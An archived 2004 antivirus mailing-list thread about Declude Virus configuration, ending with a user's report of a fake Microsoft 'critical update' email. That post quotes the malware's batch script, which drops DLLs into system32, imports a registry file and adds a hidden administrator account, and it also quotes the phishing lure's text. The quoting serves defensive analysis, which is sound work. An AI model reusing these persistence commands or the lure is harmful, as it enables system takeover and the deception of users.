Re: [Declude.Virus] Keep sending out viruses notice for forging virus?
Do I need to change all the similar line to just 1 space or tab, like BANEXT EZIP, will it work if there is more than 1 space? Only the commands in the .eml files have the one space/tab limitation. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
RE: [Declude.Virus] 8.11 possible problem
Nothing looks wrong, I've just had that one instance of a .cpl making it through (and it was, of course, virus-laden). Do you have the Declude Virus log file entries for the E-mail? -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
RE: [Declude.Virus] 8.11 possible problem
Unfortunately, no. I'm not able to identify which e-mail it was - McAfee or human error (I actually believe McAfee) blew the e-mail away. In that case, I can't think of anything that you can do to track down what happened. Without the E-mail that got through or log file entries to work with, I can come up with some possible scenarios as to what happened, but it probably wouldn't even be possible to prove or disprove any of them. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
[Declude.Virus] Bagle.Y In ZIP File Got By?
Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude? Dan begin:vcard fn:Dan Star n:Star;Dan org:Engman-Taylor Co. adr:;;W142 N9351 Fountain Blvd;Menomonee Falls;WI;53051;USA email;internet:[EMAIL PROTECTED] title:Manager of Market Analysis tel;work:262-946-0322 tel;cell:262-853-9564 x-mozilla-html:TRUE version:2.1 end:vcard
Re: [Declude.Virus] Bagle.Y In ZIP File Got By?
Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude? Every virus should be caught by Declude. What does your Declude Virus log file say for the E-mail? Are your virus definitions up-to-date? Are you running the latest beta of Declude Virus, with a line BANEXT EZIP in the \IMail\Declude\virus.cfg file? -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
Re: [Declude.Virus] Bagle.Y In ZIP File Got By?
On 5/4/2004 11:00 AM, R. Scott Perry wrote: Bagle.Y in a ZIP file got by our Declude scanner. Should this be caught by Declude? Every virus should be caught by Declude. What does your Declude Virus log file say for the E-mail? Are your virus definitions up-to-date? Are you running the latest beta of Declude Virus, with a line BANEXT EZIP in the \IMail\Declude\virus.cfg file? I wasn't aware of the BANEXT EZIP option. Thanks for pointing that out. Dan [AUTOMATED NOTE: Your mail server [208.44.131.161] is missing a reverse DNS entry. All Internet hosts are required to have a reverse DNS entry. The missing reverse DNS entry will cause your mail to be treated as spam on some servers, such as AOL.] --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.Virus.The archives can be found at http://www.mail-archive.com.
[Declude.Virus] New virus?
I've just received a fake microsoft email with a 744kb patch attached.
It was not detected by my Norton, not by F-Prot, nor AVG or McAffee.
In this patch it has a start batch file which does this:
@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab %windir%\system32\admdll.dll
cls
copy data1.cab %windir%\system32\cmdll32.exe
cls
copy layout.bin %windir%\system32\settings.reg
cls
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
cls
regedit.exe /s %windir%\system32\settings.reg
net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER
/TIMES:ALL
net localgroup Administrators system_support /ADD
cls
UPDATE.EXE
cls
exit
I've attached the email without the virus so you can have a look at it.
Adrian
---BeginMessage---
Critical
announcements
An important security announcement to all Microsoft
Windows users!
Critical Security
Update for Microsoft Windows (KB2856093)
A critical security
issue has been identified that could allow an attacker to compromise
a computer running Windows and gain control over your system and files.
This issue has been discussed in KB2856093 Microsoft Knowledge Base.
Microsoft Security Response Team recommends to protect your computer
by installing this update from Microsoft.
Patch Information:
Type:
Critical
Security Update
Vulnerability:
High
Vendor notified:
April
29, 2004
Update Release Date:
May 02, 2004
Download Size:
744
KB, 2 minutes @ 28.8 modem
File Name:
WINDOWS-KB2856093-X86-ENU.EXE
Affected Versions:
Microsoft
Windows 95/98/ME/NT/2000/XP/2003
To install this update, follow these
instructions:
1
Download
WINDOWS-KB2856093-X86-ENU.EXE file from Windows
Update site or open an attached file.
2
Launch
WINDOWS-KB2856093-X86-ENU.EXE and follow on-screen
instructions.
3
After you install this item, you may
have to restart your computer, to ensure a full protection.
©2004 Microsoft Corporation. All
rights reserved.
Terms of Use
|
Privacy Statement
---End Message---
